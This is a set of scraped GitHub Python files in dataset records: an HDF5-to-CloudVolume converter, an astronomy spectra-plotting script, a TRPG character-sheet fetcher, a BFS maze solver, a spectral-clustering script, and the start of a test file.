cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=False, parallel=False)\n cv_merge = cloudvolume.CloudVolume('file://' + cv_path, mip=0, **cv_args)\n with h5py.File(h5_path, 'r') as f:\n h5_ds = f['output']\n pbar = tqdm(local_sub_bboxes, desc='h5 to precomputed')\n for ffn_bb in pbar:\n abs_offset = ffn_bb.start\n abs_size = ffn_bb.size\n\n rel_offset = abs_offset - union_offset\n rel_size = abs_size\n\n # logging.warning('write %s %s', abs_offset, abs_size)\n h5_slc = np.s_[\n rel_offset[0]:rel_offset[0] + rel_size[0],\n rel_offset[1]:rel_offset[1] + rel_size[1],\n rel_offset[2]:rel_offset[2] + rel_size[2]\n ]\n\n cv_slc = np.s_[\n abs_offset[0]:abs_offset[0] + abs_size[0],\n abs_offset[1]:abs_offset[1] + abs_size[1],\n abs_offset[2]:abs_offset[2] + abs_size[2],\n 0\n ]\n\n cv_merge[cv_slc] = h5_ds[h5_slc]\n \n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('input', type=str, default=None, \n help='a directory with remapped/precomputed-*, config.pkl, and graph.pkl')\n parser.add_argument('--output', type=str, default=None,\n help='output_directory')\n parser.add_argument('--resolution', type=str, default='6,6,40')\n parser.add_argument('--chunk_size', type=str, default='256,256,64')\n parser.add_argument('--batch_scale', type=int, default=1,\n help='Controls how much data is loaded from h5 each time, by multiplying chunk_size')\n parser.add_argument('--global_offset', type=str, default='0,0,0')\n parser.add_argument('--flip_h5', type=bool, default=False)\n parser.add_argument('--verbose', type=bool, default=True)\n args = parser.parse_args()\n if args.verbose:\n logging.basicConfig(level='DEBUG')\n else:\n logging.basicConfig(level='ERROR')\n resolution = [int(i) for i in args.resolution.split(',')]\n chunk_size = [int(i) for i in args.chunk_size.split(',')]\n global_offset = [int(i) for i in args.global_offset.split(',')]\n\n if args.output is None:\n output = args.input\n config_path = os.path.join(args.input, 'config.pkl')\n\n\n if mpi_rank == 0:\n assert os.path.exists(config_path), 'Run reconciliate_remap first'\n with open(config_path, 'rb') as fp:\n seg_map = pickle.load(fp)\n os.makedirs(output, exist_ok=True)\n else:\n seg_map = None\n seg_map = mpi_comm.bcast(seg_map, 0)\n \n merge_output = os.path.join(output, 'agglomerated')\n h5_path = os.path.join(output, 'intermediate.h5')\n\n if mpi_rank == 0:\n union_bbox, cv_merge_path = get_union_bbox_and_merge_path(seg_map, merge_output, global_offset)\n\n # preset precomputed\n union_offset = np.array(union_bbox.minpt)\n union_size = np.array(union_bbox.maxpt) - np.array(union_bbox.minpt)\n cv_merge = prepare_precomputed(\n cv_merge_path, \n offset=union_offset, \n size=union_size, \n resolution=resolution, \n chunk_size=chunk_size)\n \n # sub divide aligned bboxes\n sub_bbox_size = [i * args.batch_scale for i in chunk_size]\n\n bbs = get_chunk_bboxes(union_bbox, sub_bbox_size)\n sub_bbs = np.array_split(bbs, mpi_size) \n logging.warn('write shapes %s %s', union_bbox, sub_bbox_size)\n\n else:\n # union_bbox = None\n union_offset = None\n cv_merge_path = None\n sub_bbs = None\n\n\n union_offset = mpi_comm.bcast(union_offset, 0)\n cv_merge_path = mpi_comm.bcast(cv_merge_path, 0)\n sub_bbs = mpi_comm.scatter(sub_bbs, 0)\n\n h5_to_cloudvolume(h5_path, cv_merge_path, union_offset, sub_bbs, \n resolution, chunk_size, args.flip_h5)\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Hanyu-Li/klab_utils","sub_path":"klab_utils/ffn/reconciliation/h5_to_cv.py","file_name":"h5_to_cv.py","file_ext":"py","file_size_in_byte":9982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"8324726194","text":"\"\"\"\nNAME:\n inspecting_mmt_ha_nb921_spectra.py\n\nPURPOSE:\n This code creates a PDF file with 9 subplots per page, inspecting\n the behavior of MMT Halpha NB921 sources around the Halpha emission\n line. Useful for manually masking unreliable spectra due to \n faulty sky subtraction.\n\nINPUTS:\n 'Spectra/spectral_MMT_grid_data.txt'\n 'Spectra/spectral_MMT_grid.fits'\n 'Spectra/spectral_MMT_grid_data.unmasked.txt'\n 'Spectra/spectral_MMT_grid.unmasked.fits'\n 'Catalogs/python_outputs/nbia_all_nsource.fits'\n 'Catalogs/nb_ia_zspec.txt'\n 'FAST/outputs/NB_IA_emitters_allphot.emagcorr.ACpsf_fast.fout'\n\nOUTPUTS:\n 'Composite_Spectra/all_MMT_HaNB921_spectra.pdf'\n\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np, numpy.ma as ma, matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nimport plotting.general_plotting as general_plotting\nfrom astropy.io import fits as pyfits, ascii as asc\nfrom create_ordered_AP_arrays import create_ordered_AP_arrays\nfrom matplotlib.backends.backend_pdf import PdfPages\n\ndef correct_instr_AP(indexed_AP, indexed_inst_str0, instr):\n '''\n Returns the indexed AP_match array based on the 'match_index' from\n plot_MMT/Keck_Ha\n '''\n for ii in range(len(indexed_inst_str0)):\n if indexed_inst_str0[ii]=='merged,':\n if instr=='MMT':\n indexed_AP[ii] = indexed_AP[ii][:5]\n elif instr=='Keck':\n indexed_AP[ii] = indexed_AP[ii][6:]\n #endif\n #endfor\n return indexed_AP\n#enddef\n\n\ndef remove_empty_plots(tempdiff, f, current_axis):\n '''\n Removes empty plots at the end of the PDF\n '''\n if tempdiff != 0:\n for ii in np.arange(8, 4-tempdiff, -1):\n f.get_axes()[ii].axis('off')\n #endfor\n #endif\n#enddef\n\n\ndef masked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP):\n '''\n Obtains the masked MMT grid data\n '''\n print('### looking at the MMT grid')\n griddata = asc.read(full_path+'Spectra/spectral_MMT_grid_data.txt',guess=False)\n gridz = np.array(griddata['ZSPEC']) ##used\n gridap = np.array(griddata['AP']) ##used\n grid = pyfits.open(full_path+'Spectra/spectral_MMT_grid.fits')\n grid_ndarr = grid[0].data ##used\n grid_hdr = grid[0].header\n CRVAL1 = grid_hdr['CRVAL1']\n CDELT1 = grid_hdr['CDELT1']\n NAXIS1 = grid_hdr['NAXIS1']\n x0 = np.arange(CRVAL1, CDELT1*NAXIS1+CRVAL1, CDELT1) ##used\n # mask spectra that doesn't exist or lacks coverage in certain areas\n ndarr_zeros = np.where(grid_ndarr == 0)\n mask_ndarr = np.zeros_like(grid_ndarr)\n mask_ndarr[ndarr_zeros] = 1\n # mask spectra with unreliable redshift\n bad_zspec = [x for x in range(len(gridz)) if gridz[x] > 9 or gridz[x] < 0]\n mask_ndarr[bad_zspec,:] = 1\n grid_ndarr = ma.masked_array(grid_ndarr, mask=mask_ndarr, fill_value=np.nan)\n\n \n index_list = general_plotting.get_index_list(NAME0, inst_str0, inst_dict, 'MMT')\n match_index = index_list[2]\n\n AP_match = correct_instr_AP(AP[match_index], inst_str0[match_index], 'MMT')\n input_index = np.array([x for x in range(len(gridap)) if gridap[x] in\n AP_match],dtype=np.int32)\n\n ff='NB921'\n ndarr = grid_ndarr[input_index]\n zspec = gridz[input_index]\n\n ndarr[np.where(ndarr.mask==True)] = np.nan\n\n x_rest = np.arange(3700, 6700, 0.1)\n new_grid = np.ndarray(shape=(len(ndarr), len(x_rest)))\n #deshifting to rest-frame wavelength\n for (row_num, ii) in zip(range(len(ndarr)), input_index):\n #normalizing\n spec_test = ndarr[row_num]\n\n #interpolating a function for rest-frame wavelength and normalized y\n x_test = x0/(1.0+zspec[row_num])\n f = interp1d(x_test, spec_test, bounds_error=False, fill_value=np.nan)\n\n #finding the new rest-frame wavelength values from the interpolation\n #and putting them into the 'new grid'\n spec_interp = f(x_rest)\n new_grid[row_num] = spec_interp\n #endfor\n return new_grid, gridap, input_index, x_rest, match_index\n#enddef\n\n\ndef unmasked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP):\n '''\n Obtains the unmasked MMT grid data\n '''\n print('### looking at the unmasked (_um) MMT grid')\n griddata = asc.read(full_path+'Spectra/spectral_MMT_grid_data.unmasked.txt',guess=False)\n gridz = np.array(griddata['ZSPEC']) ##used\n gridap = np.array(griddata['AP']) ##used\n grid = pyfits.open(full_path+'Spectra/spectral_MMT_grid.unmasked.fits')\n grid_ndarr = grid[0].data ##used\n grid_hdr = grid[0].header\n CRVAL1 = grid_hdr['CRVAL1']\n CDELT1 = grid_hdr['CDELT1']\n NAXIS1 = grid_hdr['NAXIS1']\n x0 = np.arange(CRVAL1, CDELT1*NAXIS1+CRVAL1, CDELT1) ##used\n # mask spectra that doesn't exist or lacks coverage in certain areas\n ndarr_zeros = np.where(grid_ndarr == 0)\n mask_ndarr = np.zeros_like(grid_ndarr)\n mask_ndarr[ndarr_zeros] = 1\n # mask spectra with unreliable redshift\n bad_zspec = [x for x in range(len(gridz)) if gridz[x] > 9 or gridz[x] < 0]\n mask_ndarr[bad_zspec,:] = 1\n grid_ndarr = ma.masked_array(grid_ndarr, mask=mask_ndarr, fill_value=np.nan)\n\n \n index_list = general_plotting.get_index_list(NAME0, inst_str0, inst_dict, 'MMT')\n match_index = index_list[2]\n\n AP_match = correct_instr_AP(AP[match_index], inst_str0[match_index], 'MMT')\n input_index = np.array([x for x in range(len(gridap)) if gridap[x] in\n AP_match],dtype=np.int32)\n\n ff='NB921'\n ndarr = grid_ndarr[input_index]\n zspec = gridz[input_index]\n\n ndarr[np.where(ndarr.mask==True)] = np.nan\n\n x_rest = np.arange(3700, 6700, 0.1)\n new_grid_um = np.ndarray(shape=(len(ndarr), len(x_rest)))\n #deshifting to rest-frame wavelength\n for (row_num, ii) in zip(range(len(ndarr)), input_index):\n #normalizing\n spec_test = ndarr[row_num]\n\n #interpolating a function for rest-frame wavelength and normalized y\n x_test = x0/(1.0+zspec[row_num])\n f = interp1d(x_test, spec_test, bounds_error=False, fill_value=np.nan)\n\n #finding the new rest-frame wavelength values from the interpolation\n #and putting them into the 'new grid'\n spec_interp = f(x_rest)\n new_grid_um[row_num] = spec_interp\n #endfor\n return new_grid_um\n#enddef\n\n\ndef plotting_spectra(full_path, new_grid, new_grid_um, gridap, input_index, x_rest, match_index):\n '''\n Plots the behavior of MMT Halpha NB921 sources around the Halpha emission\n line.\n \n Red dashed lines denote unmasked data; blue solid lines denote masked\n data (what will be used).\n '''\n pp = PdfPages(full_path+'Composite_Spectra/all_MMT_HaNB921_spectra.pdf')\n # get 9 per page\n for row, row_ii, AP in zip(new_grid, range(len(new_grid)), gridap[input_index]):\n if row_ii %9 == 0: # new page\n f, axarr = plt.subplots(3, 3)\n f.set_size_inches(12, 12)\n ax_list = np.ndarray.flatten(axarr)\n #endif\n \n axnum = row_ii%9\n current_axis = f.get_axes()[axnum]\n\n if not np.all(np.isnan(row/1e-17)):\n redmaskval = x_rest[np.max([x for x in range(len(row)) if not np.isnan(row[x]/1e-17)])]\n print(AP, '\\t', redmaskval)\n \n current_axis.plot(x_rest, row/1e-17, 'b', label='masked')\n current_axis.plot(x_rest, new_grid_um[row_ii]/1e-17, 'r--', alpha=0.6, label='unmasked')\n current_axis.set_xlim(6503, 6623)\n ymaxval = max(current_axis.get_ylim())\n current_axis.plot([6563,6563], [0,ymaxval],'k',alpha=0.7,zorder=1)\n current_axis.text(0.03,0.97,AP,transform=current_axis.transAxes,fontsize=7,ha='left',\n va='top')\n\n if axnum==8 or row_ii==len(new_grid)-1: #last on page\n if row_ii==len(match_index)-1: #last on last page of file\n remove_empty_plots((8-axnum), f, current_axis)\n #endif\n pp.savefig()\n plt.close()\n #endif\n #endfor\n pp.close()\n#enddef\n\n\ndef main():\n full_path = '/Users/kaitlynshin/GoogleDrive/NASA_Summer2015/'\n\n nbia = pyfits.open(full_path+'Catalogs/NB_IA_emitters.nodup.colorrev.fix.fits')\n nbiadata = nbia[1].data\n NAME0 = nbiadata['NAME']\n\n zspec = asc.read(full_path+'Catalogs/nb_ia_zspec.txt',guess=False,\n Reader=asc.CommentedHeader)\n inst_str0 = np.array(zspec['inst_str0']) ##used\n\n fout = asc.read(full_path+'FAST/outputs/NB_IA_emitters_allphot.emagcorr.ACpsf_fast.fout',\n guess=False,Reader=asc.NoHeader)\n stlr_mass = np.array(fout['col7']) ##used\n nan_stlr_mass = np.copy(stlr_mass)\n nan_stlr_mass[nan_stlr_mass < 0] = np.nan\n\n data_dict = create_ordered_AP_arrays(AP_only = True)\n AP = data_dict['AP'] ##used\n\n inst_dict = {} ##used\n inst_dict['MMT'] = ['MMT,FOCAS,','MMT,','merged,','MMT,Keck,']\n inst_dict['Keck'] = ['merged,','Keck,','Keck,Keck,','Keck,FOCAS,',\n 'Keck,FOCAS,FOCAS,','Keck,Keck,FOCAS,']\n tol = 3 #in angstroms, used for NII emission flux calculations ##used\n\n new_grid, gridap, input_index, x_rest, match_index = masked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP)\n new_grid_um = unmasked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP)\n\n plotting_spectra(full_path, new_grid, new_grid_um, gridap, input_index, x_rest, match_index)\n \n print('done')\n#enddef\n\n\nif __name__ == '__main__':\n main()","repo_name":"kaitshin/LowM_MainSequence","sub_path":"inspecting_mmt_ha_nb921_spectra.py","file_name":"inspecting_mmt_ha_nb921_spectra.py","file_ext":"py","file_size_in_byte":9471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"5789527624","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport json\r\nimport re\r\nimport aiohttp\r\n\r\nimport LakshmiErrors\r\nfrom contents.character.Investigator import Investigator, SkillSet\r\nfrom contents.character.sitegetter.AbstractCharacterGetter import AbstractCharacterGetter\r\n\r\nclass VampireBloodNetGetter(AbstractCharacterGetter):\r\n DETECT_TARGET_URL = re.compile(r\"^.*charasheet\\.vampire\\-blood\\.net.*$\", re.IGNORECASE)\r\n SKILL_TITLE_SPLIT = re.compile(r\"^([^(【〔[《『「(\\[)】〕]》』」)\\]]+)([(【〔[《『「(\\[]+)([^)】〕]》』」)\\]]+)([)】〕]》』」)\\]])?$\", re.IGNORECASE)\r\n\r\n def __init__(self):\r\n pass\r\n\r\n @classmethod\r\n def get_site_title(self) -> str:\r\n return \"キャラクター保管所 (charasheet.vampire-blood.net)\"\r\n\r\n @classmethod\r\n def is_detect_url(self, site_url: str) -> bool:\r\n return (VampireBloodNetGetter.DETECT_TARGET_URL.search(site_url) != None)\r\n\r\n @classmethod\r\n def get_favicon_url(self) -> str:\r\n return \"https://www.google.com/s2/favicons?domain=charasheet.vampire-blood.net\"\r\n\r\n @classmethod\r\n async def request(self, site_url: str) -> Investigator:\r\n result = None\r\n response = None\r\n data = None\r\n try:\r\n # https://charasheet.vampire-blood.net/help/webif\r\n request_url = site_url + \".js\"\r\n\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(request_url) as response:\r\n if response.status == 200:\r\n data = await response.json()\r\n except Exception as e:\r\n response = None\r\n\r\n if response:\r\n # COCのデータでなければ拒否する。\r\n if data[\"game\"] != \"coc\":\r\n raise LakshmiErrors.NotCallOfCthulhuInvestigatorException()\r\n\r\n result = Investigator()\r\n result.unique_id = \"\" # Key\r\n result.site_id1 = str(data[\"data_id\"]) # SiteId1\r\n result.site_id2 = str(data[\"phrase\"]) # SiteId2\r\n result.site_url = site_url # SiteUrl\r\n result.site_name = self.get_site_title() # SiteName\r\n result.site_favicon_url = self.get_favicon_url() # SiteFaviconUrl\r\n result.author_id = \"\" # 所有者ID\r\n result.author_name = \"\" # 所有者名\r\n result.active = False # Active\r\n result.lost = False # Lost\r\n result.tag = data[\"pc_tags\"] # タグ\r\n result.image_url = \"\" # 画像URL\r\n\r\n # パーソナルデータ\r\n result.personal_data.name = data[\"pc_name\"] # 名前\r\n result.personal_data.occupation = data[\"shuzoku\"] # 職業\r\n result.personal_data.age = data[\"age\"] # 年齢\r\n result.personal_data.sex = data[\"sex\"] # 性別\r\n result.personal_data.residence = \"\" # 居住地\r\n result.personal_data.birthplace = data[\"pc_kigen\"] # 出身地\r\n\r\n result.personal_data.height = data[\"pc_height\"] # 身長\r\n result.personal_data.weight = data[\"pc_weight\"] # 体重\r\n result.personal_data.hair_color = data[\"color_hair\"] # 髪の色\r\n result.personal_data.eye_color = data[\"color_eye\"] # 瞳の色\r\n result.personal_data.skin_color = data[\"color_skin\"] # 肌の色\r\n\r\n result.personal_data.backstory = data[\"pc_making_memo\"] # その他メモ\r\n\r\n # 能力値\r\n result.characteristics[\"strength\"].set_values(data[\"NA1\"], data[\"NS1\"], data[\"NM1\"], data[\"NP1\"])\r\n result.characteristics[\"constitution\"].set_values(data[\"NA2\"], data[\"NS2\"], data[\"NM2\"], data[\"NP2\"])\r\n result.characteristics[\"power\"].set_values(data[\"NA3\"], data[\"NS3\"], data[\"NM3\"], data[\"NP3\"])\r\n result.characteristics[\"dexterity\"].set_values(data[\"NA4\"], data[\"NS4\"], data[\"NM4\"], data[\"NP4\"])\r\n result.characteristics[\"appearance\"].set_values(data[\"NA5\"], data[\"NS5\"], data[\"NM5\"], data[\"NP5\"])\r\n result.characteristics[\"size\"].set_values(data[\"NA6\"], data[\"NS6\"], data[\"NM6\"], data[\"NP6\"])\r\n result.characteristics[\"intelligence\"].set_values(data[\"NA7\"], data[\"NS7\"], data[\"NM7\"], data[\"NP7\"])\r\n result.characteristics[\"education\"].set_values(data[\"NA8\"], data[\"NS8\"], data[\"NM8\"], data[\"NP8\"])\r\n result.characteristics[\"hit_points\"].set_values(data[\"NA9\"], data[\"NS9\"], data[\"NM9\"], data[\"NP9\"])\r\n result.characteristics[\"magic_points\"].set_values(data[\"NA10\"], data[\"NS10\"], data[\"NM10\"], data[\"NP10\"])\r\n result.characteristics[\"initial_sanity\"].set_values(data[\"NA11\"], data[\"NS11\"], data[\"NM11\"], data[\"NP11\"])\r\n result.characteristics[\"idea\"].set_values(data[\"NA12\"], data[\"NS12\"], data[\"NM12\"], data[\"NP12\"])\r\n result.characteristics[\"luck\"].set_values(data[\"NA13\"], data[\"NS13\"], data[\"NM13\"], data[\"NP13\"])\r\n result.characteristics[\"knowledge\"].set_values(data[\"NA14\"], data[\"NS14\"], data[\"NM14\"], data[\"NP14\"])\r\n\r\n # SAN値\r\n result.sanity_points.current = data[\"SAN_Left\"]\r\n result.sanity_points.max_insane = data[\"SAN_Max\"]\r\n result.sanity_points.indef_insane = data[\"SAN_Danger\"]\r\n\r\n # 技能\r\n result.skill_points.remaining_occupation = data[\"TS_Total\"] # 残り職業ポイント\r\n result.skill_points.remaining_interest = data[\"TK_Total\"] # 残り興味ポイント\r\n result.skill_points.max_occupation = data[\"TS_Maximum\"] # 最大職業ポイント\r\n result.skill_points.max_interest = data[\"TK_Maximum\"] # 最大興味ポイント\r\n result.skill_points.additions_occupation = data[\"TS_Add\"] # 追加職業ポイント\r\n result.skill_points.additions_interest = data[\"TK_Add\"] # 追加興味ポイント\r\n\r\n # 戦闘技能\r\n keylists = [\"dodge\", \"kick\", \"grapple\", \"fist_punch\", \"head_butt\", \"throw\", \"martial_arts\", \"handgun\", \"smg\", \"shotgun\", \"machine_gun\", \"rifle\"]\r\n self.set_skills_values(result.combat_skills, keylists, data, \"TBAU\", \"TBAD\", \"TBAS\", \"TBAK\", \"TBAA\", \"TBAO\", \"TBAP\", \"TBAName\")\r\n\r\n # 探索技能\r\n keylists = [\"first_aid\", \"locksmith\", \"conceal\", \"hide\", \"listen\", \"sneak\", \"photography\", \"psychoanalysis\", \"track\", \"climb\", \"library_use\", \"spot_hidden\"]\r\n self.set_skills_values(result.search_skills, keylists, data, \"TFAU\", \"TFAD\", \"TFAS\", \"TFAK\", \"TFAA\", \"TFAO\", \"TFAP\", \"TFAName\")\r\n\r\n # 行動技能\r\n keylists = [\"drive\", \"mech_repair\", \"opr_hvy_machine\", \"ride\", \"swim\", \"craft\", \"pilot\", \"jump\", \"electr_repair\", \"navigate\", \"disguise\"]\r\n self.set_skills_values(result.behavioral_skills, keylists, data, \"TAAU\", \"TAAD\", \"TAAS\", \"TAAK\", \"TAAA\", \"TAAO\", \"TAAP\", \"TAAName\")\r\n\r\n result.behavioral_skills[\"drive\"].skill_subname = str(data[\"unten_bunya\"]).strip()\r\n result.behavioral_skills[\"craft\"].skill_subname = str(data[\"seisaku_bunya\"]).strip()\r\n result.behavioral_skills[\"pilot\"].skill_subname = str(data[\"main_souju_norimono\"]).strip()\r\n\r\n # 交渉技能\r\n keylists = [\"fast_talk\", \"credit_rating\", \"persuade\", \"bargain\", \"own_language\"]\r\n self.set_skills_values(result.negotiation_skills, keylists, data, \"TCAU\", \"TCAD\", \"TCAS\", \"TCAK\", \"TCAA\", \"TCAO\", \"TCAP\", \"TCAName\")\r\n\r\n result.negotiation_skills[\"own_language\"].skill_subname = str(data[\"mylang_name\"]).strip()\r\n\r\n # 知識技能\r\n keylists = [\"medicine\", \"occult\", \"chemistry\", \"cthulhu_mythos\", \"art\", \"accounting\", \"archeology\", \"computer\", \"psychology\",\r\n \"anthropology\", \"biology\", \"geology\", \"electronics\", \"astronomy\", \"natural_history\", \"physics\", \"law\", \"pharmacy\", \"history\"]\r\n self.set_skills_values(result.knowledge_skills, keylists, data, \"TKAU\", \"TKAD\", \"TKAS\", \"TKAK\", \"TKAA\", \"TKAO\", \"TKAP\", \"TKAName\")\r\n\r\n result.knowledge_skills[\"art\"].skill_subname = str(data[\"geijutu_bunya\"]).strip()\r\n\r\n # TODO:\r\n # 戦闘・武器・防具\r\n # 所持品・所持金\r\n\r\n # 最終更新日時\r\n #created_at セット済み\r\n return result\r\n\r\n @classmethod\r\n def set_skills_values(self, skills, defaultkeys, data, growth_checke_key, base_key, occupation_key, interest_key, growth_key, other_key, current_key, additions_name_key):\r\n # 配列数の取得\r\n skills_count = len(data[growth_checke_key])\r\n\r\n for index in range(skills_count):\r\n growth_check = (len(str(data[growth_checke_key][index]).strip()) >= 1)\r\n\r\n if index < len(defaultkeys):\r\n # デフォルトスキル\r\n key = defaultkeys[index]\r\n else:\r\n # 追加分スキル\r\n key = f'additions_{index}'\r\n\r\n additions_index = index - len(defaultkeys) - 1\r\n additions_title = str(data[additions_name_key][additions_index]).strip()\r\n\r\n # スキル名\r\n skill_name = \"\"\r\n skill_subname = \"\"\r\n match = VampireBloodNetGetter.SKILL_TITLE_SPLIT.search(additions_title)\r\n if match:\r\n skill_name = str(match.group(1))\r\n skill_subname = str(match.group(3))\r\n else:\r\n skill_name = additions_title\r\n skill_subname = \"\"\r\n\r\n skills[key] = SkillSet(skill_name, skill_subname)\r\n # スキルタイプ\r\n skills[key].skill_type = \"additions\"\r\n\r\n skills[key].set_values(\r\n # 成長チェック\r\n growth_check,\r\n # 初期値(基礎値)\r\n int(data[base_key][index] or 0),\r\n # 職業ポイント\r\n int(data[occupation_key][index] or 0),\r\n # 興味ポイント\r\n int(data[interest_key][index] or 0),\r\n # 成長分\r\n int(data[growth_key][index] or 0),\r\n # その他増加分\r\n int(data[other_key][index] or 0),\r\n # 現在値\r\n int(data[current_key][index] or 0),\r\n )\r\n return self\r\n","repo_name":"jakenjarvis/Lakshmi","sub_path":"contents/character/sitegetter/VampireBloodNetGetter.py","file_name":"VampireBloodNetGetter.py","file_ext":"py","file_size_in_byte":10815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20676490650","text":"'''\nLink: https://cses.fi/problemset/task/1193\n \nResumen del problema: \nSimilar al Counting Rooms, se te otorga una matriz de caracteres '#'\ny '.' que representan el mapa de un edificio. '#' significa que hay{\nuna pared en esa celda, y '.' significa que esa celda es espacio libre. \n\nAdicionalmente hay dos caracteres 'A' y 'B' que denotan la celda de\ninicio y la celda del final, respectivamente.\n \nSi no existe ningún camino para ir de 'A' a 'B', debes imprimir \"NO\".\nSi existe algún camino, debes imprimir \"YES\", y hallar el que sea más\ncorto. Debes imprimir su longitud y la secuencia de movimientos de\ndicho camino. En caso exista más de un camino más corto, puedes\nimprimir cualquiera.\n\nLos movimientos están denotados por los caracteres L, R, U, D (left,\nright, up y down, respectivamente).\n'''\n\nfrom collections import deque\n \n## Dos arreglos paralelos dx, dy para enumerar movimientos\n## El movimiento i es (x + dx[i], y + dy[i])\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ndd = list(\"DURL\") #para enumerar movimientos\nn, m = [int(x) for x in input().split()] \n\n#Matriz para el mapa\nmat = [[] for x in range(n)] \n\nstart, end = (-1, -1), (-1, -1)\nfor i in range(n):\n\tmat[i] = list(input())\n\tfor j in range(m):\n\t\tif mat[i][j] == 'A':\n\t\t\tstart = (i, j)\n\t\tif mat[i][j] == 'B':\n\t\t\tend = (i, j)\n\n# Matriz de visitados y movimientos realizados\np = [[-1 for y in range(m)] for x in range(n)] #p\n\np[start[0]][start[1]] = -2\nq = deque([start])\n\ndef valid(r, c):\n\treturn (r >= 0) and (r= 0) and (c < m) \\\n\t\tand (mat[r][c] != '#') and (p[r][c] == -1)\n\ndef reconstruct_path():\n\tprint(\"YES\")\n\tr, c = end\n\tpath = deque()\n\twhile p[r][c] >= 0:\n\t\ti = p[r][c] \n\t\tpath.appendleft(dd[i])\n\t\tr -= dx[i]\n\t\tc -= dy[i]\n\tprint(len(path))\n\tprint(''.join(path))\n\n\t\t\nwhile len(q):\n\tr, c = q.popleft()\n\tif (r, c) == end:\n\t\treconstruct_path()\n\t\texit()\n\tfor i in range(4):\n\t\tnr, nc = r + dx[i], c + dy[i]\n\t\tif valid(nr, nc):\n\t\t\tp[nr][nc] = i\n\t\t\tq.append((nr, nc))\n\nprint(\"NO\")\n","repo_name":"oscarburga/tutorias-complejidad-algoritmica-2020-02","sub_path":"s5/labyrinth.py","file_name":"labyrinth.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"10243454772","text":"# To get the packages: pip3 install -r requirements.txt\n\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport numpy.linalg as npl\nimport fileLoad\n\nnp.set_printoptions(suppress=True)\n\nA = np.array( [ [0, 1, 1, 0, 0, 0, 0, 0, 0]\n , [1, 0, 1, 0, 0, 0, 0, 0, 0]\n , [1, 1, 0, 1, 1, 0, 0, 0, 0]\n , [0, 0, 1, 0, 1, 1, 1, 0, 0]\n , [0, 0, 1, 1, 0, 1, 1, 0, 0]\n , [0, 0, 0, 1, 1, 0, 1, 1, 0]\n , [0, 0, 0, 1, 1, 1, 0, 1, 0]\n , [0, 0, 0, 0, 0, 1, 1, 0, 1]\n , [0, 0, 0, 0, 0, 0, 0, 1, 0]\n ])\n\nAsmall = np.array( [ [0, 1, 1, 0, 0, 0]\n , [1, 0, 1, 0, 0, 0]\n , [1, 1, 0, 1, 0, 0]\n , [0, 0, 1, 0, 1, 1]\n , [0, 0, 0, 1, 0, 1]\n , [0, 0, 0, 1, 1, 0]\n ])\n\ndef mkLaplacian(A):\n L = A * -1\n D = [sum(row) for row in A]\n for x in range(0, len(D)):\n L[x,x] = D[x] + A[x,x]\n return L\n\ndef mkEigenDecom(L):\n return npl.eig(L)\n\n# We need second smallest because of math\ndef getSecondSmallestEigenVector(eigenDecom):\n eigValues = eigenDecom[0]\n smallestIndex = 0\n secondSmallIndex = 0\n smallestValue = float('inf')\n secondSmallValue = float('inf')\n\n for x in range(0,len(eigValues)):\n value = eigValues[x]\n if value <= smallestValue:\n secondSmallValue = smallestValue\n secondSmallIndex = smallestIndex\n\n smallestValue = value\n smallestIndex = x\n elif value <= secondSmallValue:\n secondSmallValue = value\n secondSmallIndex = x\n\n return eigenDecom[1][:,secondSmallIndex]\n\ndef getClusterAmount(matrix):\n return 5 # dynamic\n\ndef getClusters(amount, eigenVector):\n kmeans = KMeans(n_clusters=amount)\n transposed = eigenVector.reshape(-1,1)\n\n return kmeans.fit(transposed.real).labels_\n\ndef runSmallExample(): # from Lecture 7, slide 28\n L = mkLaplacian(Asmall)\n print(L)\n eiDecom = mkEigenDecom(L)\n print(eiDecom)\n sSEV = getSecondSmallestEigenVector(eiDecom)\n print(sSEV)\n clusters = getClusters(2, sSEV) \n print(clusters)\n\ndef run():\n print(\"Loading network...\")\n A, _ = fileLoad.getSparseFriendsDefault()\n print(\"Done\")\n print(\"Laplacian... \")\n L = mkLaplacian(A)\n print(\"Done\")\n print(\"Getting eigendecomposition...\")\n eiDecom = mkEigenDecom(L)\n print(\"Done\")\n print(\"Getting second smallest eigen vector...\")\n sSEV = getSecondSmallestEigenVector(eiDecom)\n print(\"Done\")\n print(\"\\\"Computing\\\" cluster amounts...\")\n clustAmount = getClusterAmount(sSEV)\n print(\"Done\")\n print(\"Getting clusters...\")\n clusters = getClusters(clustAmount, sSEV)\n print(clusters)\n\n print(\"Writing clusters to file: 'material/clusteringResults.txt'...\")\n with open('material/clusteringResults.txt', 'w') as f:\n for item in clusters:\n f.write(\"%s\\n\" % item)\n\n print(\"Done\")\n\n\n\nrunSmallExample()\n# The small graph\n# 1 \\ / 5\n# | 3 - 4 |\n# 2 / \\ 6\n# \n# sSEV: [ 0.46470513 0.46470513 0.26095647 -0.26095647 -0.46470513 -0.46470513]\n# Splits: [1 1 1 0 0 0]\n\n\n#run()\n\n","repo_name":"Jgfrausing/wi-network","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10256345174","text":"\nimport unittest\nfrom mock import patch\nfrom mock import Mock\nfrom pygsver.bump import run_bump\nfrom pygsver.bump import check_prerelease\nfrom pygsver.bump import bump_version\nfrom pygsver.errors import 